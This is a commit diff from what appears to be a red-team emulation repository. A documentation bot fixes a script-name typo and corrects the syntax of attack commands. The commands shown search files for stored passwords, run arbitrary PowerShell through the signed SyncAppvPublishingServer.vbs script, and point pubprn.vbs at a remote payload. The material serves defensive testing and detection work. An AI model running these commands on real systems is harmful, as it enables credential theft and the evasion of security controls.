security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=master

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2020-02-11 21:36:43 +00:00
parent dd4783b2a5
commit f762d6ac0b
5 changed files with 16 additions and 16 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1081/T1081.md
+1 -1
View File
@@ -75,7 +75,7 @@ Extracting Credentials from Files
#### Attack Commands: Run with `powershell`!
```
findstr /si pass *.xml | *.doc | *.txt | *.xls
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -Pattern password
```
atomics/T1216/T1216.md
+4 -4
View File
@@ -10,7 +10,7 @@ There are several other signed scripts that may be used in a similar manner. (Ci
- [Atomic Test #1 - PubPrn.vbs Signed Script Bypass](#atomic-test-1---pubprnvbs-signed-script-bypass)
- [Atomic Test #2 - SyncAppvPublishingServe Signed Script PowerShell Command Execution](#atomic-test-2---syncappvpublishingserve-signed-script-powershell-command-execution)
- [Atomic Test #2 - SyncAppvPublishingServer Signed Script PowerShell Command Execution](#atomic-test-2---syncappvpublishingserver-signed-script-powershell-command-execution)
- [Atomic Test #3 - manage-bde.wsf Signed Script Command Execution](#atomic-test-3---manage-bdewsf-signed-script-command-execution)
@@ -42,8 +42,8 @@ cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs local
<br/>
<br/>
## Atomic Test #2 - SyncAppvPublishingServe Signed Script PowerShell Command Execution
Executes the signed SyncAppvPublishingServe script with options to execute an arbitrary PowerShell command.
## Atomic Test #2 - SyncAppvPublishingServer Signed Script PowerShell Command Execution
Executes the signed SyncAppvPublishingServer script with options to execute an arbitrary PowerShell command.
**Supported Platforms:** Windows
@@ -56,7 +56,7 @@ Executes the signed SyncAppvPublishingServe script with options to execute an ar
#### Attack Commands: Run with `command_prompt`!
```
C:\windows\system32\SyncAppvPublishingServe.vbs \n;#{command_to_execute}
C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
```
atomics/index.md
+2 -2
View File
@@ -378,7 +378,7 @@
- Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows]
- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows]
- Atomic Test #2: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows]
- T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1151 Space after Filename](./T1151/T1151.md)
@@ -789,7 +789,7 @@
- Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows]
- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows]
- Atomic Test #2: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows]
- [T1153 Source](./T1153/T1153.md)
- Atomic Test #1: Execute Script using Source [macos, linux]
atomics/index.yaml
+7 -7
View File
@@ -11705,8 +11705,8 @@ defense-evasion:
localhost "script:#{remote_payload}"
'
- name: SyncAppvPublishingServe Signed Script PowerShell Command Execution
description: 'Executes the signed SyncAppvPublishingServe script with options
- name: SyncAppvPublishingServer Signed Script PowerShell Command Execution
description: 'Executes the signed SyncAppvPublishingServer script with options
to execute an arbitrary PowerShell command.
'
@@ -11720,7 +11720,7 @@ defense-evasion:
executor:
name: command_prompt
elevation_required: false
command: 'C:\windows\system32\SyncAppvPublishingServe.vbs \n;#{command_to_execute}
command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
'
- name: manage-bde.wsf Signed Script Command Execution
@@ -19885,7 +19885,7 @@ credential-access:
name: powershell
elevation_required: false
command: |
findstr /si pass *.xml | *.doc | *.txt | *.xls
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -Pattern password
- name: Access unattend.xml
description: 'Attempts to access unattend.xml, where credentials are commonly
@@ -23311,8 +23311,8 @@ execution:
localhost "script:#{remote_payload}"
'
- name: SyncAppvPublishingServe Signed Script PowerShell Command Execution
description: 'Executes the signed SyncAppvPublishingServe script with options
- name: SyncAppvPublishingServer Signed Script PowerShell Command Execution
description: 'Executes the signed SyncAppvPublishingServer script with options
to execute an arbitrary PowerShell command.
'
@@ -23326,7 +23326,7 @@ execution:
executor:
name: command_prompt
elevation_required: false
command: 'C:\windows\system32\SyncAppvPublishingServe.vbs \n;#{command_to_execute}
command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
'
- name: manage-bde.wsf Signed Script Command Execution
atomics/windows-index.md
+2 -2
View File
@@ -170,7 +170,7 @@
- Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows]
- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows]
- Atomic Test #2: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows]
- T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1221 Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -665,7 +665,7 @@
- Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows]
- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows]
- Atomic Test #2: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows]
- T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1127 Trusted Developer Utilities](./T1127/T1127.md)